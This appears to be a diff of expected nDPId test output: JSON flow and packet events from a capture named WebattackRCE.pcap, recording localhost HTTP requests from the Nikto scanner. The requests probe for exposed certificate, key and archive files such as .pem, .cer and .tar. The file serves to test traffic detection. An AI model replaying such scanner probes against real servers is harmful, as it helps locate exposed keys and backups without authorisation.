+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1576420276869,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276869,"pkt":"AAAAAAAAAAAAAAAACABFAADBxdFAAEAGdmN\/AAABfwAAAcKIH5BDzv2PC6KyZoAYAED+tQAAAQEICp1m+6ydZvusR0VUIC8xMjcuMC5wZW0gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1576420276870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276870,"pkt":"AAAAAAAAAAAAAAAACABFAADAIL1AAEAGG3l\/AAABfwAAAcKKH5D\/Dxj7MLgvIIAYAED+tAAAAQEICp1m+66dZvuuR0VUIC9zaXRlLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1576420276871,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276871,"pkt":"AAAAAAAAAAAAAAAACABFAADAmdRAAEAGomF\/AAABfwAAAcKMH5DqwaGU3VMvd4AYAED+tAAAAQEICp1m+6+dZvuvR0VUIC9zaXRlLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1576420276872,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276872,"pkt":"AAAAAAAAAAAAAAAACABFAADFFSZAAEAGJwt\/AAABfwAAAcKOH5D96y1nB6jLDIAYAED+uQAAAQEICp1m+7CdZvuwR0VUIC8xMjcuMC4wLjEuY2VyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1576420276873,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276873,"pkt":"AAAAAAAAAAAAAAAACABFAADFhm9AAEAGtcF\/AAABfwAAAcKQH5BNzL4wefiP1IAYAED+uQAAAQEICp1m+7GdZvuxR0VUIC8xMjcuMC4wLjEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1576420276874,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276874,"pkt":"AAAAAAAAAAAAAAAACABFAADCE1BAAEAGKOR\/AAABfwAAAcKSH5DnJisNBZiCk4AYAED+tgAAAQEICp1m+7KdZvuyR0VUIC8xMjcwMDEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1576420276876,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276876,"pkt":"AAAAAAAAAAAAAAAACABFAADCnWxAAEAGnsd\/AAABfwAAAcKUH5Co\/aUqs\/1iGoAYAED+tgAAAQEICp1m+7SdZvu0R0VUIC8xMjcwMDEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1576420276877,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276877,"pkt":"AAAAAAAAAAAAAAAACABFAADAt7lAAEAGhHx\/AAABfwAAAcKWH5CQPI\/1lm3rwoAYAED+tAAAAQEICp1m+7WdZvu1R0VUIC9zaXRlLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 